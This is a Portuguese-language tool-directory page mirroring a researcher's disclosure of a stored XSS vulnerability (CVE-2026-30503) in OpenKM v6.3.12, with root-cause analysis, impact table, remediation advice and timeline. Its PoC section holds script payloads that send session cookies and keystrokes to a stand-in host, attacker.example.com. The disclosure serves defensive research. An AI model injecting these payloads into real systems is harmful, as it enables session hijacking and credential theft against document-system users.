Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — Divulgação detalhada do CVE-2026-30503, uma vulnerabilidade XSS armazenada no OpenKM v6.3.12. Inclui análise da causa raiz, payloads de PoC, avaliação de impacto e recomendações de remediação para pesquisadores de segurança e pentesters. | Kitploit
Ferramentas/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Divulgação detalhada do CVE-2026-30503, uma vulnerabilidade XSS armazenada no OpenKM v6.3.12. Inclui análise da causa raiz, payloads de PoC, avaliação de impacto e recomendações de remediação para pesquisadores de segurança e pentesters.

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2026-30503 — Stored XSS no OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Descoberto e Reportado por Dharmendra Kumar — Pesquisador de Segurança

Cibersegurança | Testes de Penetração | Pesquisa de Vulnerabilidades | Divulgação Responsável


📌 Índice

  • Visão Geral
  • Detalhes do CVE
  • Produto Afetado
  • Descrição da Vulnerabilidade
  • Análise da Causa Raiz
  • Impacto e Avaliação de Risco
  • Prova de Conceito (PoC)
  • Correção e Recomendações
  • Cronograma de Divulgação
  • Referências
  • Sobre o Pesquisador

  • 🔍 Visão Geral

    Este repositório documenta a divulgação responsável da CVE-2026-30503, uma vulnerabilidade de Cross-Site Scripting Armazenado (Stored XSS) identificada no OpenKM v6.3.12 — um sistema de gerenciamento de documentos de código aberto amplamente utilizado em ambientes corporativos.

    A vulnerabilidade permite que um atacante autenticado injete JavaScript malicioso persistente na aplicação, que é executado no contexto do navegador de qualquer usuário (incluindo administradores) que posteriormente visualize o conteúdo afetado.

    ⚠️ Gravidade: Alta | Vetor de Ataque: Rede | Privilégios Necessários: Baixos | Interação do Usuário: Necessária


    📋 Detalhes do CVE

    CampoDetalhes
    ID CVECVE-2026-30503
    ProdutoOpenKM
    Versão Afetadav6.3.12
    Classe da VulnerabilidadeCross-Site Scripting Armazenado (XSS)
    CWECWE-79: Neutralização Incorreta da Entrada Durante a Geração da Página Web
    Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
    PesquisadorDharmendra Kumar
    Tipo de DivulgaçãoResponsável / Coordenada

    📦 Produto Afetado

    OpenKM é um sistema de gerenciamento de documentos (DMS) gratuito e de código aberto que fornece uma interface web para gerenciar, auditar e distribuir documentos empresariais. É utilizado por empresas, órgãos governamentais e instituições educacionais globalmente.

    • Nome do Produto: Sistema de Gerenciamento de Documentos OpenKM
    • Versão Afetada: v6.3.12
    • Site do Fornecedor: https://www.openkm.com
    • Categoria: Sistema de Gerenciamento de Documentos (DMS)
    • Linguagem/Stack: Java (JSP/Spring)

    🧨 Descrição da Vulnerabilidade

    Múltiplas vulnerabilidades de Cross-Site Scripting Armazenado (XSS) foram descobertas no OpenKM v6.3.12. Um atacante com acesso autenticado de baixo privilégio pode injetar payloads JavaScript arbitrários em um ou mais campos de entrada. Esses payloads são armazenados permanentemente no backend da aplicação e executados automaticamente sempre que qualquer usuário — incluindo administradores — acessar a página ou componente afetado.

    Ao contrário do XSS Refletido, que exige que a vítima clique em um link manipulado, os payloads de XSS Armazenado são embutidos na própria aplicação, tornando-os significativamente mais perigosos e persistentes.

    Endpoint(s) Vulnerável(eis)

    • Campos de entrada controlados pelo usuário dentro de metadados de documentos, notas ou campos de nome
    • A aplicação não sanitiza ou codifica a entrada do usuário antes de renderizá-la de volta ao navegador

    🔬 Análise da Causa Raiz

    A vulnerabilidade decorre de três fraquezas combinadas no pipeline de tratamento de entrada da aplicação:

    root@kitploit:~
    Entrada do Usuário ──► [NENHUMA Validação] ──► Armazenada no BD ──► [NENHUMA Codificação de Saída] ──► Renderizada no Navegador ──► XSS Executado
    
    FraquezaDescrição
    ❌ Validação de Entrada AusenteA aplicação não restringe ou sanitiza caracteres especiais (<, >, ", ', ;) em campos fornecidos pelo usuário
    ❌ Codificação de Saída AusenteOs valores armazenados são renderizados diretamente em HTML sem codificação de entidades HTML
    ❌ Renderização DOM InseguraDados fornecidos pelo usuário são incorporados no contexto DOM sem CSP ou controles de sanitização

    💥 Impacto e Avaliação de Risco

    Uma exploração bem-sucedida desta vulnerabilidade pode levar a:

    RiscoDescrição
    🍪 Sequestro de SessãoRoubar tokens de sessão autenticados via exfiltração de document.cookie
    👤 Tomada de ContaComprometer contas de vítimas, incluindo contas de administrador
    🔐 Coleta de CredenciaisInjetar formulários de phishing para capturar credenciais de login
    📤 Exfiltração de DadosExtrair silenciosamente documentos ou metadados sensíveis do DMS
    ⚙️ Ações Não AutorizadasRealizar operações privilegiadas em nome da vítima (excluir/modificar documentos)
    🎯 Alvo em AdministradoresO payload é executado no painel de administração quando um administrador revisa o conteúdo
    🔄 Propagação de WormO payload XSS autorreplicante pode se espalhar entre usuários

    🧪 Prova de Conceito (PoC)

    ⚠️ Aviso: Esta PoC é compartilhada estritamente para fins educacionais e de pesquisa em segurança, sob os princípios de divulgação responsável. Não utilize isso contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar.

    Exemplo de Payload (Genérico)

    root@kitploit:~
    // PoC básica — demonstra execução de script
    <script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>
    
    // Exfiltração de token de sessão
    <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>
    
    // Injeção de keylogger
    <script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>
    

    Passos para Reproduzir

    1. Faça login no OpenKM v6.3.12 com uma conta autenticada de baixo privilégio
    2. Navegue até o campo de entrada vulnerável (ex.: metadados / notas / campo de título do documento)
    3. Injete um payload XSS, como <script>alert(document.cookie)</script>
    4. Salve / envie a entrada
    5. Faça login como um usuário diferente (ou administrador) e navegue até o recurso afetado
    6. Observe o payload JavaScript sendo executado no contexto do navegador da vítima

    🛠️ Correção e Recomendações

    Para Desenvolvedores / Fornecedores

    RecomendaçãoImplementação
    ✅ Validação de EntradaLista branca de caracteres permitidos; rejeitar ou remover caracteres especiais HTML em todas as entradas do usuário
    ✅ Codificação de SaídaUsar codificação HTML sensível ao contexto (ex.: OWASP Java Encoder) antes de renderizar dados em HTML
    ✅ Política de Segurança de Conteúdo (CSP)Implementar um cabeçalho CSP restrito: Content-Security-Policy: script-src 'self'
    ✅ Cookies HTTPOnly e SegurosDefinir flags HttpOnly e Secure em todos os cookies de sessão para evitar acesso via JavaScript
    ✅ Usar Bibliotecas de SegurançaIntegrar OWASP AntiSamy ou DOMPurify para sanitização HTML
    ✅ Revisão de Segurança de CódigoAuditar todos os caminhos de renderização em busca de dados controlados pelo usuário não sanitizados
    ✅ AtualizaçãoAplicar o patch mais recente fornecido pelo fornecedor ou atualizar para uma versão corrigida

    Para Administradores de Sistema

    • 🔒 Restringir o acesso à instância do OpenKM apenas a redes confiáveis
    • 📊 Monitorar logs da aplicação em busca de atividades incomuns ou tags de script inesperadas em campos de entrada
    • 🔄 Manter a aplicação atualizada para a versão corrigida mais recente
    • 🧩 Implantar um Firewall de Aplicação Web (WAF) com regras de detecção de XSS como controle compensatório

    📅 Cronograma de Divulgação

    DataEvento
    🔍 DescobertaVulnerabilidade identificada durante avaliação de segurança do OpenKM v6.3.12
    📧 Notificação ao FornecedorRelatório de divulgação inicial enviado à equipe de segurança do OpenKM
    🤝 Reconhecimento pelo FornecedorEquipe do OpenKM reconheceu o relatório
    📝 Atribuição do CVECVE-2026-30503 atribuído pelo Programa CVE
    🌐 Divulgação PúblicaDivulgação pública coordenada após o período de correção

    Esta vulnerabilidade foi divulgada seguindo as melhores práticas de divulgação responsável, coordenando com o fornecedor e o Programa CVE antes do lançamento público.


    📚 Referências

    • 🔗 [ Github] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
    • 🔗 Entrada MITRE CVE — CVE-2026-30503
    • 🔗 NVD — National Vulnerability Database
    • 🔗 Site Oficial OpenKM
    • 🔗 Folha de Dicas de Prevenção de XSS do OWASP
    • 🔗 CWE-79: Cross-site Scripting
    • 🔗 OWASP Top 10 — A03:2021 Injeção

    👨‍💻 Sobre o Pesquisador

    Dharmendra Kumar

    Pesquisador de Segurança | Testador de Penetração | Caçador de Bugs

    Dharmendra Kumar é um pesquisador independente de cibersegurança especializado em segurança de aplicações web, testes de penetração e divulgação responsável de vulnerabilidades. Com foco na identificação de falhas de segurança do mundo real em softwares amplamente utilizados, seu trabalho contribui para melhorar a postura de segurança das aplicações usadas globalmente.

    Áreas de Especialização:

    • 🌐 Teste de Penetração em Aplicações Web
    • 🐛 Caça a Bugs (Bug Bounty)
    • 🔍 Pesquisa de Vulnerabilidades e Reporte de CVE
    • 📋 Divulgação Responsável e Avisos de Segurança
    • 🛡️ Vulnerabilidades OWASP Top 10

    Conecte-se:

    LinkedIn GitHub Twitter


    ⚖️ Aviso Legal

    Este repositório destina-se exclusivamente a fins educacionais e informativos. Os detalhes da vulnerabilidade e os payloads de prova de conceito compartilhados aqui são publicados de acordo com os princípios de divulgação responsável. O autor não endossa, incentiva ou se responsabiliza por qualquer uso não autorizado destas informações. Sempre obtenha permissão explícita por escrito antes de realizar testes de segurança em qualquer sistema.


    🙏 Agradecimentos

    Agradecimentos especiais:

    • À equipe de desenvolvimento do OpenKM pela cooperação durante o processo de divulgação responsável
    • Ao Programa CVE / MITRE Corporation por atribuir e coordenar o identificador CVE
    • À comunidade mais ampla de pesquisa em segurança por seus esforços contínuos para tornar o software mais seguro para todos

    ⭐ Se esta pesquisa foi útil, considere marcar este repositório com uma estrela.

    © 2026 Dharmendra Kumar — Todos os Direitos Reservados

    Visitantes

    Baixar ferramenta